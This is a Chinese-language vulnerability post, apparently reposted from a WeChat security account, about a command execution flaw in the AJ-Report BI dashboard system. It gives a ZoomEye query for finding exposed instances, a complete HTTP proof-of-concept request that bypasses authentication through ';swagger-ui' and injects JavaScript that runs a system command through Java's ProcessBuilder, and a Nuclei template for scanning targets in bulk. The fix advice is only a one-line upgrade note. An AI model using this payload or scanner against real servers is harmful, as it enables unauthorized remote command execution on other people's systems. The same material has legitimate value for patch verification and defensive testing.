AJ-Report数据大屏系统存在命令执行漏洞

admin 2024年5月7日12:48:22评论19 views字数 2561阅读8分32秒阅读模式

0x01 产品简介

        AJ-Report是一个完全开源的BI平台,酷炫大屏展示,能随时随地掌控业务动态,让每个决策都有数据支撑。多数据源支持,内置mysql、elasticsearch、kudu等多种驱动,支持自定义数据集省去数据接口开发,支持17+种大屏组件,不会开发,照着设计稿也可以制作大屏。三步轻松完成大屏设计:配置数据源---->写SQL配置数据集---->拖拽配置大屏---->保存发布。欢迎体验。这里利用 ZoomEye搜索引擎直接输入关键字即可,影响资产非常多。

AJ-Report数据大屏系统存在命令执行漏洞

声明

请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。

TIPS: 末尾领取资料及福利-批量检测脚本在末尾(新增语雀漏洞库)

0x02 漏洞描述

        攻击者可以通过不同的方式获取命令执行漏洞的利用机会,如通过Web应用程序的输入参数、文件上传漏洞等方式注入系统命令,并在Web服务器上执行。在这些漏洞可以被很容易地利用和滥用的低级别语言或系统中,例如C或Windows下的cmd.exe或powershell.exe,从而导致被攻击的系统受到各种操作系统级别的攻击和利用。

0x03 ZoomEye语法

title:"AJ-Report"

AJ-Report数据大屏系统存在命令执行漏洞

0x04 漏洞复现

POC

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1Host: {}Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Content-Type: application/json;charset=UTF-8Connection: closeContent-Length: 345{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder("whoami").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

AJ-Report数据大屏系统存在命令执行漏洞

Nuclei批量检测POC(请自行搭建环境检测)
id: AJ-Report-swagger-ui-rceinfo:  name: AJ-Report-swagger-ui-rce  author: HackTwo  severity: high  description: |    漏洞测试-RCE  reference:    - https://wx.zsxq.com/dweb2/index/group/88885811181452  tags: autohttp:  - raw:      - |        POST /dataSetParam/verification;swagger-ui/ HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate        Content-Type: application/json;charset=UTF-8        Connection: close        {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder("whoami").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}    matchers:      - type: dsl        dsl:          - status_code==200 && contains_all(body,"message","args","操作成功")

AJ-Report数据大屏系统存在命令执行漏洞

0x05 修复建议

官方已经推出新版本,建议升级到最新版

 

原文始发于微信公众号(渗透安全HackTwo):AJ-Report数据大屏系统存在命令执行漏洞(未公开)|漏洞预警

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月7日12:48:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   AJ-Report数据大屏系统存在命令执行漏洞https://cn-sec.com/archives/2707574.html

发表评论

匿名网友 填写信息